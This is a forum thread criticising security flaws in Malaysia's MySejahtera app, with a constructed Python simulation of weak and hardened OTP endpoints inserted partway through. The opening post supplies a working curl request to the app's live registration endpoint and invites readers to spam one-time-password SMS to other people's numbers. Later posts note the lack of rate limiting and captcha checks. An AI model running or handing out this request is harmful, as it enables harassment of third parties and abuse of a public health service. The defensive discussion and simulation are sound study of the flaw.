
MySejahtera Not So Sejahtera, Full of Exploits

TSDarkripper
post Oct 18 2021, 01:51 PM, updated 9 months ago

What do you expect?
Senior Member
1,255 posts

Joined: Dec 2008
From: /k/
You can instruct "MySejahtera" to spam OTPs to others at will. Just run the following code in the terminal of your choice and change the contact number (Windows users, adapt it yourselves).

CODE
curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \
--form 'countryCode="60"' \
--form 'contactNumber="12345678"'

imin
post Oct 18 2021, 02:04 PM

Enthusiast
Senior Member
802 posts

Joined: Jan 2003
I'm not testing whether this really works, but if it does, then the backend looks like it was developed by some intern IT student.
DarkAeon
post Oct 18 2021, 02:06 PM

Enthusiast
Senior Member
716 posts

Joined: Nov 2010
QUOTE(imin @ Oct 18 2021, 02:04 PM)
I'm not testing whether this really works, but if it does, then the backend looks like it was developed by some intern IT student.
*
70 mil yo
moonsatelite
post Oct 18 2021, 02:07 PM

On my way
Junior Member
576 posts

Joined: Mar 2016

Which is why my friend uses a throwaway email as MySejahtera ID
kidmad
post Oct 18 2021, 02:08 PM

Look at all my stars!!
Senior Member
4,106 posts

Joined: Jul 2005
This API should not even be exposed! It's supposed to be called by a backend module!
Doomsday
post Oct 18 2021, 02:11 PM

keluarpattern dupe slayer
Senior Member
2,354 posts

Joined: Dec 2004
From: initrd


Mafioso, why don't you do the backend properly?
WaCKy-Angel
post Oct 18 2021, 02:12 PM

PeACe~~
All Stars
20,358 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 01:51 PM)
You can instruct "MySejahtera" to spam OTPs to others at will. Just run the following code in the terminal of your choice and change the contact number (Windows users, adapt it yourselves).

CODE
curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \
--form 'countryCode="60"' \
--form 'contactNumber="12345678"'

*
Do you even need an exploit?

I thought you can just try to log in with the number and the app will send an OTP?
TSDarkripper
post Oct 18 2021, 02:13 PM

What do you expect?
Senior Member
1,255 posts

Joined: Dec 2008
From: /k/
QUOTE(imin @ Oct 18 2021, 02:04 PM)
I'm not testing whether this really works, but if it does, then the backend looks like it was developed by some intern IT student.
*
Go ahead and try; the URL is legit anyway. You can use Postman or other tools as well; as long as you send that form data, it works. These mistakes are worse than an intern's, lol.

QUOTE(kidmad @ Oct 18 2021, 02:08 PM)
This API should not even be exposed! It's supposed to be called by a backend module!
*
They actually kind of forgot to verify the captcha. They have a captcha on the page, but the backend doesn't verify that token.
WaCKy-Angel
post Oct 18 2021, 02:14 PM

PeACe~~
All Stars
20,358 posts

Joined: Dec 2004
From: KL



QUOTE(imin @ Oct 18 2021, 02:04 PM)
I'm not testing whether this really works, but if it does, then the backend looks like it was developed by some intern IT student.
*
What do you expect when it is already doing what it is supposed to do?

Do you know you can also do similar OTP spam with WhatsApp?

Get your enemy's WhatsApp phone number and try logging in with the number. That person will keep getting OTP spam on his phone.
TSDarkripper
post Oct 18 2021, 02:15 PM

What do you expect?
Senior Member
1,255 posts

Joined: Dec 2008
From: /k/
QUOTE(WaCKy-Angel @ Oct 18 2021, 02:12 PM)
Do you even need an exploit?

I thought you can just try to log in with the number and the app will send an OTP?
*
There is no rate limit, meaning you can keep requesting OTPs repeatedly with a simple script.

Triggering the OTP is not the issue; the issue is the lack of an authentication/authorization token. Maybe the implementer had the same thought as you.

Also, the OTP token never changes, at least for the past 19 hours that I have been spamming myself.

This post has been edited by Darkripper: Oct 18 2021, 02:16 PM
ShadowR1
post Oct 18 2021, 02:23 PM

Im still HeRe ...
Senior Member
1,434 posts

Joined: Jan 2007
From: The Long river ...


It's a 70 mil feature lah...
kidmad
post Oct 18 2021, 02:23 PM

Look at all my stars!!
Senior Member
4,106 posts

Joined: Jul 2005
QUOTE(Darkripper @ Oct 18 2021, 02:13 PM)
Go ahead and try; the URL is legit anyway. You can use Postman or other tools as well; as long as you send that form data, it works. These mistakes are worse than an intern's, lol.
They actually kind of forgot to verify the captcha. They have a captcha on the page, but the backend doesn't verify that token.
*
To send notifications they can just use something like an F5 BIG-IP to whitelist so that only allowed IP addresses can access the endpoints. In fact, just build the service separately and segregate the internal and external networks.
WaCKy-Angel
post Oct 18 2021, 02:24 PM

PeACe~~
All Stars
20,358 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 02:15 PM)
There is no rate limit, meaning you can keep requesting OTPs repeatedly with a simple script.

Triggering the OTP is not the issue; the issue is the lack of an authentication/authorization token. Maybe the implementer had the same thought as you.

Also, the OTP token never changes, at least for the past 19 hours that I have been spamming myself.
*
A simple captcha will not be sufficient to block hackers.

Anyway, security vs. convenience has always been a cat and mouse game. The more you do, the more hackers want to find exploits, lol.
TSDarkripper
post Oct 18 2021, 02:27 PM

What do you expect?
Senior Member
1,255 posts

Joined: Dec 2008
From: /k/
QUOTE(kidmad @ Oct 18 2021, 02:23 PM)
To send notifications they can just use something like an F5 BIG-IP to whitelist so that only allowed IP addresses can access the endpoints. In fact, just build the service separately and segregate the internal and external networks.
*
They can't do that, as that's the endpoint the client side calls to trigger it. The easiest way is just rate limiting plus some kind of captcha. That would reduce the exposure to an acceptable level.

QUOTE(WaCKy-Angel @ Oct 18 2021, 02:24 PM)
A simple captcha will not be sufficient to block hackers.

Anyway, security vs. convenience has always been a cat and mouse game. The more you do, the more hackers want to find exploits, lol.
*
It won't solve everything, but it reduces the exposure.
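The weaknesses Darkripper lists above (a captcha token that the backend never verifies, no rate limit, an OTP that never changes) and the rate-limit-plus-captcha fix he settles on, modelled side by side as an added Python example. This is illustration code written for this page; it is not MySejahtera's backend and not from anyone in the thread. The endpoint classes, the captcha-token prefix that stands in for the provider's verify call, the limits (3 requests per 10 minutes, 5-minute OTP lifetime) and the in-memory storage are all assumptions, and no network requests are made.

```python
import hmac
import secrets
import time
from collections import defaultdict

# Constructed stand-in for the captcha provider's server-side verify call.
# Assumption: a token starting with this prefix is one the page widget issued;
# a real backend would POST the token plus its secret to the provider instead.
CAPTCHA_OK_PREFIX = "captcha-ok-"


def verify_captcha(token, used_tokens):
    """Accept a well-formed token exactly once (real providers reject replays too)."""
    if not token or not token.startswith(CAPTCHA_OK_PREFIX) or token in used_tokens:
        return False
    used_tokens.add(token)
    return True


class WeakRegisterPhone:
    """Models the behaviour reported in the thread: the form carries a captcha
    token the backend never checks, nothing limits repeats, and the OTP that
    goes out is always the same."""

    def __init__(self):
        self.sent = []               # one entry per SMS the endpoint would trigger
        self.static_otp = "123456"   # assumed value; never rotates

    def handle(self, country_code, contact_number, captcha_token=None):
        self.sent.append(country_code + contact_number)
        return 200, self.static_otp


class HardenedRegisterPhone:
    """Same endpoint with the controls discussed in the thread (captcha verified
    server-side, per-number rate limit) plus a fresh, expiring, single-use OTP.
    All limits are illustrative assumptions."""

    def __init__(self, max_per_window=3, window_s=600, otp_ttl_s=300, now=time.time):
        self.now = now                       # injectable clock so tests can advance time
        self.max_per_window = max_per_window
        self.window_s = window_s
        self.otp_ttl_s = otp_ttl_s
        self.used_tokens = set()
        self.history = defaultdict(list)     # number -> timestamps of issued OTPs
        self.otps = {}                       # number -> (otp, expiry)
        self.sent = []

    def handle(self, country_code, contact_number, captcha_token=None):
        if not verify_captcha(captcha_token, self.used_tokens):
            return 403, None                 # missing, forged or replayed captcha
        if not (country_code.isdigit() and contact_number.isdigit()
                and 7 <= len(contact_number) <= 12):
            return 400, None
        key = country_code + contact_number
        t = self.now()
        recent = [s for s in self.history[key] if t - s < self.window_s]
        if len(recent) >= self.max_per_window:
            self.history[key] = recent
            return 429, None                 # too many OTPs for this number
        recent.append(t)
        self.history[key] = recent
        otp = "".join(secrets.choice("0123456789") for _ in range(6))
        self.otps[key] = (otp, t + self.otp_ttl_s)
        self.sent.append(key)
        return 200, otp

    def verify_otp(self, country_code, contact_number, candidate):
        """Constant-time compare; the stored OTP is consumed on success or expiry."""
        key = country_code + contact_number
        record = self.otps.get(key)
        if record is None:
            return False
        otp, expiry = record
        if self.now() > expiry:
            del self.otps[key]
            return False
        if hmac.compare_digest(otp, candidate):
            del self.otps[key]
            return True
        return False


def simulate(handler, attempts, token_for):
    """Fire `attempts` requests for one constructed number and tally the status
    codes and distinct OTPs issued; token_for(i) gives the captcha token for request i."""
    codes = defaultdict(int)
    otps = set()
    for i in range(attempts):
        code, otp = handler.handle("60", "12345678", token_for(i))
        codes[code] += 1
        if otp is not None:
            otps.add(otp)
    return dict(codes), otps


if __name__ == "__main__":
    print("weak:", simulate(WeakRegisterPhone(), 50, lambda i: None))
    hard = HardenedRegisterPhone()
    print("hardened, no captcha:", simulate(hard, 5, lambda i: None))
    print("hardened, fresh captchas:", simulate(hard, 5, lambda i: f"captcha-ok-{i}"))
```

Running it shows the weak handler answering 50 requests with 200 and the same OTP every time, while the hardened handler returns 403 without a verified captcha, issues three distinct OTPs and then 429 within the window, and rejects a replayed captcha token. The 429 is keyed on the target number rather than the caller's IP, which is what stops one number from being flooded from many sources.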
jmas
post Oct 18 2021, 02:29 PM

On my way
Junior Member
639 posts

Joined: Mar 2010
QUOTE(DarkAeon @ Oct 18 2021, 02:06 PM)
70 mil yo
*
I thought it was already debunked that the 70 mil does not include MySejahtera?
kons
post Oct 18 2021, 02:32 PM

Конс
Moderator
6,039 posts

Joined: Oct 2004



tengine webserver...

twitter bootstrap.. google font api... owl carousel.. jquery...

All free stuff but it cost 70m... thanks to our competent government.
WaCKy-Angel
post Oct 18 2021, 02:34 PM

PeACe~~
All Stars
20,358 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 02:27 PM)
They can't do that, as that's the endpoint the client side calls to trigger it. The easiest way is just rate limiting plus some kind of captcha. That would reduce the exposure to an acceptable level.
It won't solve everything, but it reduces the exposure.
*
IINM, MySejahtera was developed merely for check-in purposes but has now become more important.
Of course, security-wise it was not a top priority back then.

Why not tweet KJ about this and see what actions he will take?
TSDarkripper
post Oct 18 2021, 02:37 PM

What do you expect?
Senior Member
1,255 posts

Joined: Dec 2008
From: /k/
QUOTE(jmas @ Oct 18 2021, 02:29 PM)
I thought it was already debunked that the 70 mil does not include MySejahtera?
*
Cost is not the question here. This is a critical app required by most residents in Malaysia; you cannot compromise on security, yo. Imagine a data breach?


QUOTE(kons @ Oct 18 2021, 02:32 PM)
tengine webserver...

twitter bootstrap.. google font api... owl carousel.. jquery...

All free stuff but it cost 70m... thanks to our competent government.
*
I see you're a man of culture here. jQuery hurts my eyes though.
TSDarkripper
post Oct 18 2021, 02:37 PM

What do you expect?
Senior Member
1,255 posts

Joined: Dec 2008
From: /k/
QUOTE(WaCKy-Angel @ Oct 18 2021, 02:34 PM)
IINM, MySejahtera was developed merely for check-in purposes but has now become more important.
Of course, security-wise it was not a top priority back then.

Why not tweet KJ about this and see what actions he will take?
*
Tweeted, still no news yet. So yeah.
WaCKy-Angel
post Oct 18 2021, 02:38 PM

PeACe~~
All Stars
20,358 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 02:37 PM)
Tweeted, still no news yet. So yeah.
*
Slowly lah, wait for him to think of a good comeback like Dajjal, hahahaha.

Who knows, later he will employ you as their security consultant, eh?
